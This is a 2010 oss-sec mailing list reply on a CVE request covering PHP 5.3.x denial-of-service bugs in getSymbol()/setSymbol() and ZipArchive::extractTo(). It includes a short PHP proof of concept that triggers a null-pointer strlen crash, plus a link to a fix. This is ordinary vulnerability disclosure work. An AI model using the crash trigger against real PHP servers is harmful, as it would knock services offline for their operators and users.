oss-sec mailing list archives
Re: CVE request (PHP 5.3.x getSymbol() DoS; CERT VU#479900)
From: Maksymilian Arciemowicz <cxib () securityreason com>
Date: Tue, 7 Dec 2010 22:43:17 +0000 (UTC)
Tomas Hoger <thoger@...> writes:
> Btw, setSymbol() is affected too, and does not seem to be addressed in r305571. In both cases, it's PHP exposing ICU bug.
setSymbol() gives only a DoS with strlen(NULL) [CWE-170].
getSymbol(): integer overflow which causes a heap overflow.
See also ZipArchive::extractTo()
Possible CWE-170 strlen(NULL)
PoC:
<?php
$zip = new ZipArchive;
$zip->open('./dupa.zip');
var_dump($zip->extractTo('/tmp', array('', '')));
?>
Fix:
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/php_zip.c?view=log
